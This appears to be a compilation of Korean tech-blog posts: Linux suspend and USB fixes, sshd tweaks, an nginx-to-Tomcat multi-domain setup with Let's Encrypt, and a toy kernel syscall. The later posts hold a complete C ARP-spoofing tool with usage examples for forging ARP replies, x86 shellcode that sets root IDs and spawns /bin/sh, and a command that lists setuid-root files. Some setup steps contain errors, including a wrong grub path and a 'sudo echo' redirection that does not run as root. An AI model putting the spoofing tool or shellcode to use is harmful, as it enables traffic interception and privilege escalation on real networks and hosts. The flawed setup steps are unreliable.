절전 모드에서 나오지 못하고 강제 리부팅후에 /var/log/syslog 를 보니 아래의 로그가 있었다.

 

pr 30 13:34:49 pc-linux systemd[1]: anacron.service: Succeeded.
Apr 30 13:34:49 pc-linux systemd[1]: motd-news.service: Succeeded.
Apr 30 13:34:49 pc-linux systemd[1]: Finished Message of the Day.
Apr 30 13:35:30 pc-linux acpid: input device has been disconnected, fd 24


Apr 30 14:08:38 pc-linux kernel: [    0.000000] Linux version 5.8.0-50-generic (buildd@lgw01-amd64-030) (gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #56~20.04.1-Ubuntu SMP Mon Apr 12 21:46:35 UTC 2021 (Ubuntu 5.8.0-50.56~20.04.1-generic 5.8.18)
Apr 30 14:08:38 pc-linux systemd-modules-load[408]: Inserted module 'parport_pc'
Apr 30 14:08:38 pc-linux kernel: [    0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-5.8.0-50-generic root=UUID=9cff6431-fc36-40b9-b47b-a57914ef6d71 ro quiet splash crashkernel=512M-:192M
Apr 30 14:08:38 pc-linux kernel: [    0.000000] KERNEL supported cpus:
Apr 30 14:08:38 pc-linux kernel: [    0.000000]   Intel GenuineIntel
Apr 30 14:08:38 pc-linux kernel: [    0.000000]   AMD AuthenticAMD

저것을 검색해보니 절전모드에서 usb 마우스 키보드가 닫혀 버리는 버그가 있다고 합니다.

 

그래서 해결방법은 usb를 절전모드로 들어가지 않게 하는것이라고 합니다.

 

해결방법은

 

해결방법 1 :

/etc/defaults/grub 에서 GRUB_CMDLINE_LINUX_DEFAULT 끝에

"usbcore.autosuspend=-1" 를 추가하면 됩니다.

 

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash usbcore.autosuspend=-1"

 

그후  update-grub 를 실했시키고 재부팅합니다.

 

해결방법 2

$ sudo echo "options usbcore autosuspend=-1" > /etc/modprobe.d/disable-usb-autosuspend.conf

 

해당 명령어를 실행후 재부팅한다.

/etc/ssh/sshd_config 파일를 수정하고 재시작

# /etc/ssh/sshd_config

UseDNS no  # 추가


# 위의것으도 안되면

GSSAPIAuthentication no  # 이것추가.
GSSAPICleanupCredentials yes # 이것추가.


위의 방법이 안된다면..

systemd-logind.service 서비스를 재시작한다.

# systemctl restart systemd-logind.service


그런데 이게 재시작이 안될경우가 있다

이럴때는 systemctl 데몬을 재시작한다.

# systemctl daemon-reexec 



참고 URL : https://unix.stackexchange.com/questions/393394/systemd-logind-service-fails-to-start-when-attempting-to-return-from-rescue-tar

nginx 설정


vi /etc/nginx/sites-available/default  에 최상단에 아래 내용 추가.

upstream        tomcat {
         server  127.0.0.1:8080  fail_timeout=0;
 }


nginx 첫번재 도메인(www.hoticel.net) 설정

# 예제 1. http://www.hoticel.net

vi /etc/nginx/sites-available/www.hoticle.net

# hoticle.net => www.hoticle.net
server {
        listen 80;
        server_name hoticle.net;
        return 301 $scheme://www.hoticle.net$request_uri;
}

# www.hoticle.net 설정
server {
        listen 80;
        listen [::]:80;

        server_name www.hoticle.net;

        # Let's Encrypt 관련 디렉토리
        location /.well-known {
                # Note that a request for /.well-known/test.html whill
                # look for /var/www/ssl-prof-rancher/.well-known/test.html
                # and not /var/www/ssl-proof/rancher/test.html
                root /var/www/ssl-proof/tomcat/;
        }

        location / {
                proxy_redirect off;
                proxy_pass_header Server;

                proxy_set_header Host $http_host;
                proxy_set_header X-Forwarded-Proto $scheme;
                proxy_set_header X-Forwarded-Port $server_port;
                proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
                proxy_set_header X-Real-IP $remote_addr;
                proxy_set_header X-Scheme $scheme;
                proxy_pass http://tomcat;
                charset utf-8;
        }
}
 



두번째 도메인 설정 ( www.bbb.net )

# 예제 1. http://www.bbb.net

vi /etc/nginx/sites-available/www.bbb.net

# www.bbb.net 설정
server {
        listen 80;
        listen [::]:80;

        server_name www.bbb.net;

        # Let's Encrypt 관련 디렉토리
        location /.well-known {
                # Note that a request for /.well-known/test.html whill
                # look for /var/www/ssl-prof-rancher/.well-known/test.html
                # and not /var/www/ssl-proof/rancher/test.html
                root /var/www/ssl-proof/tomcat/;
        }

        location / {
                proxy_redirect off;
                proxy_pass_header Server;

                proxy_set_header Host $http_host;
                proxy_set_header X-Forwarded-Proto $scheme;
                proxy_set_header X-Forwarded-Port $server_port;
                proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
                proxy_set_header X-Real-IP $remote_addr;
                proxy_set_header X-Scheme $scheme;
                proxy_pass http://tomcat;
                charset utf-8;
        }




# nginx 문법 테스트

nginx -t

# nginx 재시작

systemctl restart nginx.service



Tomcat 설정


server.xml 설정

vi /etc/tomcat/server.xml

 <Connector port="8080" protocol="HTTP/1.1"
               connectionTimeout="20000"
               URIEncoding="UTF-8"
               address="127.0.0.1"
               redirectPort="8443" />

...


       <Host name="www.hoticle.net" appBase="/var/www/Hoticle" autoDeploy="true"  xmlValidation="false" xmlNamespaceAware="false">
              <Context path="/" docBase="" reloadable="true" />
      </Host>
      <Host name="www.bbb.net" appBase="/var/www/bbb" autoDeploy="true"  xmlValidation="false" xmlNamespaceAware="false">
              <Context path="/" docBase="" reloadable="true" />
      </Host>


  </Engine>

  </Service>
</Server> 



# tomcat 재실행

systemctl restart tomcat8.service



Let's Encrypt

Let's Encrypt  실행

# certbot --nginx -d www.hoticel.net -d www.bbb.net



crontab 등록

# Let's Encrypt
30 2 * * * certbot renew --noninteractive --renew-hook "/bin/systemctl reload nginx" >> /var/log/le-renew.log



참고 사이트 :

https://tom.busby.ninja/letsecnrypt-nginx-reverse-proxy-no-downtime/
https://www.digitalocean.com/community/tutorials/how-to-secure-nginx-with-let-s-encrypt-on-debian-8

# cat /etc/nginx/sites-available/default
# Default server configuration
#
server {
        listen 80 default_server;
        listen [::]:80 default_server;

        root /var/www/html;

        # Add index.php to the list if you are using PHP
        index index.php index.html index.htm index.nginx-debian.html;

        server_name _;

        location / {
                try_files $uri $uri/ =404;
        }

        location ~ ^/~(?<user>.+?)(?<path>/.*)?$ {
                alias /home/$user/public_html$path;
                autoindex on;

                location ~ \.php$ {
                        if (!-f $request_filename) { return 404; }

                        fastcgi_pass unix:/run/php/php7.0-fpm.sock;
                        fastcgi_intercept_errors on;
                        include fastcgi_params;
                        fastcgi_param  SCRIPT_FILENAME $request_filename;
                }
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;

                # With php7.0-cgi alone:
                # fastcgi_pass 127.0.0.1:9000;
                # With php7.0-fpm:
                fastcgi_pass unix:/run/php/php7.0-fpm.sock;
        }



        # deny access to .htaccess files, if Apache's document root
        # concurs with nginx's one
        #
        location ~ /\.ht {
                deny all;
        }


Hello world! 출력 커널 프로그래밍(32bit)

간략 버전


1. cd /usr/src/linux-2.6.32.60


2. arch/x86/kernel/syscall_table_32.S  추가 --> .long sys_hello_world        /* 337 */


3. arch/x86/include/asm/unistd_32.h  추가 --> #define __NR_hello_world     337 추가(337 은 마지막 숫자(336) + 1)


4. kernel/hello_world.c 생성 --> 


/* kernel/hello_world.c */

#include <linux/linkage.h>
#include <linux/unistd.h>
#include <linux/kernel.h>

asmlinkage int sys_hello_world()
{
    printk("Hello World!\n");
    return (0);
}
 


5. kernel/Makefile 수정


obj-y += groups.o hello_world.o  # hello_world.o 추가


6. 커널 컴파일

 # make mrproper && make clean && make menuconfig && make && make modules && make modules_install


7. 커널용 램디스크 생성

# cd /boot && mkinitramfs -o initrd.img-2.6.32.60 2.6.32.60


8. #update-grub && reboot


9. kernel include 링크 설정.

# cd /usr/include

# mv asm asm_bak

# mv linux linux_bak

# ln -sf /usr/src/linux-2.6.32.60/arch/x86/include/asm asm

#  ln -sf /usr/src/linux-2.6.32.60/arch/x86/include/linux linux


10. 테스트 코드 작성 및 컴파일

$ cd ~

$ mkdir tmp

$ vi mysys.c


#include <linux/unistd.h>
#include <stdio.h>
int main() {
     printf("%d\n", syscall(__NR_hello_world));
     return 0;


$ make mysys

$ ./mysys


11. 커널 로그 확인

$ dmsg

 ...

 [ 4501.406221] Hello World!

1. tomcat6, eclipse, java6 설치

 yaourt jdk6

 pacman -S tomcat6

 yaourt eclipse-indigo


2. wdt 설치

 eclipse --> help --> Install New SoftWare... --> Add... --> http://download.eclipse.org/releases/indigo 추가후 업데이트

 eclipse --> help --> Install New SoftWare... --> Add... --> Web Tools Platform SDK 3.3.2 설치.


3. eclipse 사용할 계정 tomcat 그룹에 추가.

 # gpasswd -a $USER tomcat


4. eclipse tomcat6 서버 설정

 eclipse --> window --> Preferences --> Server --> Runtime Environments --> Add

 tomcat6 선택 --> Tomcat Directory :  /usr/share/tomcat6 --> Finish



arpspoof가  libnet과 libpcap이 필요해서 그냥 한번 raw socket으로만으로 되게 만들어봤습니다.

 사용법은 
 
  au [-r] -i <ethernet interface> -t <target ip> <source ip>

  exam) au -i eth0 192.168.0.10 192.168.0.5 : ARP REQUEST
        au -r -i eth0 192.168.0.10 192.168.0.1 : ARP REPLY


// au.c
// gcc -o au au.c
// auther : http://fehead.tistory.com
#include <stdio.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>// struct sockaddr_ll
#include <sys/ioctl.h>		// struct ifreq
#include <strings.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <signal.h>

typedef unsigned char	uchar;
typedef unsigned short	ushort;

// ethernet frame header.
struct eth_hdr
{
	uchar	h_dest[6];				// destination ether addr
	uchar	h_source[6];			// source ether addr
	ushort	h_proto;				// packet type ID field
} __attribute__((packed));

static const int ETHERNET_SIZE = sizeof(struct eth_hdr);

// ARP header
struct arp_hdr
{
	ushort	ar_hrd;		// Hardware type : ethernet
	ushort	ar_pro;     // Protocol		 : IP
	uchar	ar_hln;     // Hardware size
	uchar	ar_pln;     // Protocal size
	ushort	ar_op;      // Opcode replay
	uchar	ar_sha[6];  // Sender MAC
	uchar	ar_sip[4];  // Sender IP
	uchar	ar_tha[6];  // Target mac
	uchar	ar_tip[4];  // Target IP
} __attribute__((packed));

static const int ARP_SIZE = sizeof(struct arp_hdr);


static uchar g_buf[sizeof(struct eth_hdr)+sizeof(struct arp_hdr)];
static const char * g_source_ip = NULL;
static const char * g_interface = NULL;
static int g_sock = -1;

// dumps raw memory in hex byte and printable split format
void dump(const uchar *data_buffer, const unsigned int length) {
	uchar byte;
	unsigned int i, j;
	for(i=0; i < length; i++) {
		byte = data_buffer[i];
		printf("%02x ", data_buffer[i]);  // display byte in hex
		if(((i%16)==15) || (i==length-1)) {
			for(j=0; j < 15-(i%16); j++)
				printf("   ");
			printf("| ");
			for(j=(i-(i%16)); j <= i; j++) {  // display printable bytes from line
				byte = data_buffer[j];
				if((byte > 31) && (byte < 127)) // outside printable char range
					printf("%c", byte);
				else
					printf(".");
			}
			printf("\n"); // end of the dump line (each line 16 bytes)
		} // end if
	} // end for
}


// get interface mac addr.
//  exam) interface2mac("eth0", buf);
// return : 1 success
//        : 0 failure
int interface2mac(const char * interface, uchar * mac)
{
	int fd = socket(PF_INET, SOCK_STREAM, 0);
	if(fd == -1)
	{
		perror("socket");
		return 0;
	}

	struct ifreq iflist;
	bzero(&iflist, sizeof(iflist));
	strncpy(iflist.ifr_name, interface, sizeof(iflist.ifr_name));
	if(ioctl(fd, SIOCGIFHWADDR, &iflist) == -1)
	{
		perror("ioctl failed");
		return 0;
	}
	
	struct sockaddr * sa = &iflist.ifr_hwaddr;
	memcpy(mac, sa->sa_data, 6);

	close(fd);

#ifdef _DEBUG
	printf("interface2mac: %s\n", interface);
	dump(mac, 6);
#endif // _DEBUG
	return 1;
}

// get mac address to arp cash.
//  exam) get_arp_to_arpcash(ip)
// return : 1 success
//        : 0 failure
int get_arp_to_arpcash(unsigned long ip)
{
	int fd = 0;
	if((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
		return 0;

	struct sockaddr_in sin;
	bzero(&sin, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = ip;
	sin.sin_port = htons(67);

	int i = sendto(fd, NULL, 0, 0, (struct sockaddr *)&sin, sizeof(sin));

	close(fd);

	return (i == 0);
}

// get MAC address from ip, interface
//  exam) arp_cash_lookup("eth0", ip, buf)
// return : 1 success
//        : 0 failure
int arp_cash_lookup(const char * interface, unsigned long ip, uchar * mac)
{
	int sock = 0;
	struct arpreq	ar;
	struct sockaddr_in * sin = 0;

	bzero(&ar, sizeof(ar));

	strncpy(ar.arp_dev, interface, sizeof(ar.arp_dev));
	sin = (struct sockaddr_in *)&ar.arp_pa;
	sin->sin_family = AF_INET;
	sin->sin_addr.s_addr = ip;

	if((sock = socket(AF_INET, SOCK_DGRAM, 0)) == -1)
		return 0;

	if(ioctl(sock, SIOCGARP, (caddr_t)&ar) == -1)
	{
		close(sock);
		return 0;
	}
	close(sock);
	memcpy(mac, ar.arp_ha.sa_data, 6);

	return 1;
}

// string to mac address
//  exam) "01:02:03:0d:0e:0f" --> "\x01\x02\0x03\x0d\x0e\x0f"
// return : 1 success
//        : 0 failure
int str2mac(const char * str_mac, uchar * mac)
{
	int ret = sscanf(str_mac, "%hhx:%hhx:%hhx:%hhx:%hhx:%hhx",
			&mac[0], &mac[1], &mac[2],
			&mac[3], &mac[4], &mac[5]);

#ifdef _DEBUG
	int i = 0;
	printf("MAC : ");
	for(i = 0 ; i < 6 ; ++i)
		printf("%hhx:", mac[i]);

	printf("\n");
#endif // _DEBUG

	return ret;
}

// string to ip.
//  exam) "192.168.0.1" --> "\xc0\xa8\x00\x01"
// return : 1 success
//        : 0 failure
int str2ip(const char * str_ip, uchar * ip)
{
	int ret = sscanf(str_ip, "%hhu.%hhu.%hhu.%hhu",
			&ip[0], &ip[1], &ip[2], &ip[3]);

#ifdef _DEBUG
	int i = 0;
	printf("IP : ");
	for(i = 0 ; i < 4 ; ++i)
		printf("%hhu.", ip[i]);
	printf("\n");
#endif // _DEBUG
	return ret;
}

// convert ip to mac address
//  exam) ip2mac("eth0", "192.168.0.10", buf);
// return : 1 success
//        : 0 failure
int ip2mac(const char * intf, const char * str_ip, uchar * mac)
{
	int i = 0;
	unsigned int ip = 0;
	if(str2ip(str_ip, (uchar *)&ip) == 0)
		return 0;

	do
	{
		if(arp_cash_lookup(intf, ip, mac) == 1)
		{
#ifdef _DEBUG
			printf("ip2mac: %s\n", str_ip);
			dump(mac, 6);
#endif // _DEBUG
			return 1;
		}
		get_arp_to_arpcash(ip);

		sleep(1);
	}
	while(i++ < 3);

	return 0;
}

// init arp packet.
void init_packet(struct eth_hdr * e, struct arp_hdr * a, int reply)
{
	bzero(e, sizeof(*e));
	memset(e->h_dest, 0xff, sizeof(e->h_dest));
	e->h_proto = htons(0x0806);	// ARP protocol

	bzero(a, sizeof(*a));
	a->ar_hrd = htons(0x0001);	// Ethernet 10/100Mbps.
	a->ar_pro = htons(0x0800);	// IP protocol
	a->ar_hln = 6;				// hardware len
	a->ar_pln = 4;				// protocol len

	if(reply == 1)
		a->ar_op = htons(0x0002);	// 1 :request, 2 :reply
	else
		a->ar_op = htons(0x0001);	// 1 :request, 2 :reply

#ifdef _DEBUG
	printf("init_packet Ethernet Header:\n");
	dump((uchar *)e, sizeof(*e));

	printf("init_packet ARP Header:\n");
	dump((uchar *)a, sizeof(*a));
#endif // _DEBUG
}


// create rawsocket.
//  exam) rawsocket("eth0")
// return -1 : failure.
//        0 <= : success.
int rawsocket(const char * interface)
{
	int fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
	if(fd == -1)
	{
		perror("socket create:");
		return -1;
	}

	struct ifreq ifr;
	bzero(&ifr, sizeof(ifr));

	// select network interface ex) "eth0"
	strcpy((char *)ifr.ifr_name, interface);
	if(ioctl(fd, SIOCGIFINDEX, &ifr) == -1)
	{
		perror("error getting interface index\n");
		close(fd);
		return -1;
	}

	struct sockaddr_ll	sll;

	bzero(&sll, sizeof(sll));
	sll.sll_family = AF_PACKET;
	sll.sll_ifindex = ifr.ifr_ifindex;
	sll.sll_protocol = htons(ETH_P_ALL);

	if(bind(fd, (struct sockaddr*)&sll, sizeof(sll)) == -1)
	{
		perror("Error binding raw socket to interface\n");
		close(fd);
		return -1;
	}

	return fd;
}

void sig_cleanup(int signo)
{
	printf("clean up\n");

	struct eth_hdr * ether = (struct eth_hdr *)g_buf;
	struct arp_hdr * arp = (struct arp_hdr *)(g_buf+ETHERNET_SIZE);

	uchar source_mac[6] = { 0, };
	if(g_sock != -1 && ip2mac(g_interface, g_source_ip, source_mac) == 1)
	{
		// set source mac to original mac address
		memcpy(ether->h_source, source_mac, 6);
		memcpy(arp->ar_sha, source_mac, 6);
		
		int i = 0;
		for(i = 0 ; i < 3 ; ++i)
		{
			write(g_sock, g_buf, ETHERNET_SIZE+ARP_SIZE);
			sleep(1);
		}

		close(g_sock);
	}

	exit(0);
}

void usage()
{
	printf( "au [-r] -i <ethernet interface> -t <target ip> <source ip>\n"
			"  exam) au -i eth0 192.168.0.10 192.168.0.5 : ARP REQUEST\n"
			"        au -r -i eth0 192.168.0.10 192.168.0.1 : ARP REPLY\n");
	exit(1);
}

// au -i eth0 -t 192.168.0.10 192.168.0.1
int main(int argc, char * argv[])
{
	const char * target_ip = NULL;
	int			reply = 0;			// ARP reply

	g_interface = "eth0";
	int c = 0;
	while((c = getopt(argc, argv, "ri:t:")) != -1)
	{
		switch(c)
		{
		case 'i':
			g_interface = optarg;
			break;
		case 't':
			target_ip = optarg;
			break;
		case 'r':	// ARP REPLY
			reply = 1;
			break;
		default:
			usage();
		}
	}

	argc -= optind;
	argv += optind;

	if(argc != 1)
		usage();

	g_source_ip = argv[0];
	
	bzero(g_buf, sizeof(g_buf));

	struct eth_hdr * ether = (struct eth_hdr *)g_buf;
	struct arp_hdr * arp = (struct arp_hdr *)(g_buf+ETHERNET_SIZE);

	init_packet(ether, arp, reply);

	if(interface2mac(g_interface, ether->h_source) == 0 ||
			ip2mac(g_interface, target_ip, ether->h_dest) == 0 ||
			str2ip(g_source_ip, arp->ar_sip) == 0 ||
			str2ip(target_ip, arp->ar_tip) == 0)
	{
		usage();
	}

	if(reply)
	{
		// ether->h_source == my mac		OK
		// ether->h_dest == target mac		OK
		// arp->ar_sha == my mac
		memcpy(arp->ar_sha, ether->h_source, sizeof(arp->ar_sha));

		// arp->ar_sip == source ip		OK
		// arp->ar_tha == target mac
		memcpy(arp->ar_tha, ether->h_dest, sizeof(arp->ar_tha));

		// arp->ar_tip == target ip			OK
	}
	else
	{
		// ether->h_source == my mac		OK
		// ether->h_dest == "\xff\xff\xff\xff\xff\xff"
		memset(ether->h_dest, 0xff, 6);

		// arp->ar_sha == my mac
		memcpy(arp->ar_sha, ether->h_source, sizeof(arp->ar_sha));

		// arp->ar_sip == my ip				OK source ip is my ip
		// arp->ar_tha == "\x00\x00\x00\x00\x00\x00"
		memset(arp->ar_tha, 0, 6);
		// arp->ar_tip == target ip			OK

		signal(SIGINT, &sig_cleanup);
	}

#ifdef _DEBUG
	printf("Ethernet Header:\n");
	dump((uchar *)ether, sizeof(*ether));

	printf("ARP Header:\n");
	dump((uchar *)arp, sizeof(*arp));
#endif // _DEBUG

	// create rawsocket
	g_sock = rawsocket(g_interface);
	if(g_sock == -1)
		return 1;

	for(;;)
	{
		putchar('.'); fflush(stdout);
		if(write(g_sock, g_buf, ETHERNET_SIZE+ARP_SIZE) < 1)
		{
			perror("write");
			break;
		}

		if(reply != 1)
			break;

		sleep(2);
	}

	close(g_sock);

	return 0;
}

$ cat priv_shell.s
BITS 32
global _start

_start:
;setresuid(uid_t ruid, uid_t euid, uid_t suid)
xor ebx, ebx  ; root ruid = 0
xor ecx, ecx  ; root euid = 0
xor edx, edx ; root suid = 0
xor eax, eax
mov al, 0xa4 ; setresuid call number = 0xa4(164)
int 0x80

;int execve(const char * filename, char * const argv[], char * const envp[])
; execve("/bin//sh", ["/bin//sh", 0x0], [ 0x0 ]);

xor eax, eax  ; eax = 0
push eax
push '//sh'
push '/bin'   ; "/bin//sh", 0x0

mov ebx, esp  ; const char * filename = "/bin//sh", 0x0
push eax
mov edx, esp  ; char * const envp[] = [ 0 ]
push ebx
mov ecx, esp  ; char * const argv[] = [ "/bin//sh", 0 ]
mov al, 11
int 0x80


$ xxd priv_shell
0000000: 31db 31c9 31d2 31c0 b0a4 cd80 31c0 5068  1.1.1.1.....1.Ph
0000010: 2f2f 7368 682f 6269 6e89 e350 89e2 5389  //shh/bin..P..S.
0000020: e1b0 0bcd 80                             .....

$ cat tiny_shell.s
BITS 32
global _start

_start:
;int execve(const char * filename, char * const argv[], char * const envp[])
; execve("/bin//sh", ["/bin//sh", 0x0], [ 0x0 ]);

xor eax, eax  ; eax = 0
push eax
push '//sh'
push '/bin'   ; "/bin//sh", 0x0

mov ebx, esp  ; const char * filename = "/bin//sh", 0x0
push eax
mov edx, esp  ; char * const envp[] = [ 0 ]
push ebx
mov ecx, esp  ; char * const argv[] = [ "/bin//sh", 0 ]
mov al, 11
int 0x80

$ ndisasm -B32 tiny_shell
00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  682F2F7368        push dword 0x68732f2f
00000008  682F62696E        push dword 0x6e69622f
0000000D  89E3              mov ebx,esp
0000000F  50                push eax
00000010  89E2              mov edx,esp
00000012  53                push ebx
00000013  89E1              mov ecx,esp
00000015  B00B              mov al,0xb
00000017  CD80              int 0x80

$ xxd tiny_shell
0000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e350  1.Ph//shh/bin..P
0000010: 89e2 5389 e1b0 0bcd 80                   ..S......


find /-user root -perm -4000

위의 것은 root로 setuid가 걸린 파일들을 찾아준다.

여기서 에러가 화면에 출력되어 짜증나는데 에러가 나오지않게 할려면

끝에 2> /dev/null 를 추가하면된다.


find /-user root -perm -4000 2> /dev/null

+ Recent posts